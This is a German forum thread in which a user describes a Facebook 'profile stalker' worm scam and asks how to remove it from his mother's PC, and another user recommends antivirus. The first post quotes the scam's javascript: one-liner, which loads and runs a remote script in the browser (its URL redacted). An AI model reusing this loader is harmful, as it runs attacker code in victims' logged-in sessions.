Sicherheitsprogramme: den Facebook Wurm entfernen

Kitanu

yohohohoho
Hallo liebe Dr.Windows Gemeinde,

ich hab gerade im Facebook Profil meiner Mutter dieses schöne "Meine Top Profil-Stalker:" gesehn und dachte mir da waaar doch mal was wegen Wurm.

Also hab ich auf den Link geklickt und würde auf eine Seite weitergeleitet, wo ich aufgefordert wurde ein Java script
Code:
javascript:(a=(b=document).createElement('script')).src='//[COLOR="Red"]LINK ENTFERNT[/COLOR]?'+Math.random(),b.body.appendChild(a);void(0)

einzufügen, hab mir den Link den ich Rauseditiert hab im Browser eingefügt und Kaspersky PURE fing sofort wegen Wurm an zu Motzen.

Also Denke ich mir mal meine Mutter hat ihn sich eingefangen da sie kein Virenschutz besitzt.
Sie Bringt ihn mir morgen mal Vorbei. Jetzt wollte ich euch fragen wie ich es hinbekomme den zu löschen ohne gleich zu Formatieren.
 
Anzeige

egeo

Wird mal Profi....Geduld!
Also Denke ich mir mal meine Mutter hat ihn sich eingefangen da sie kein Virenschutz besitzt.
Und installiere bei Deiner Mutter bei der Gelegenheit gleich mal einem Virenschutz!;)
 
Oben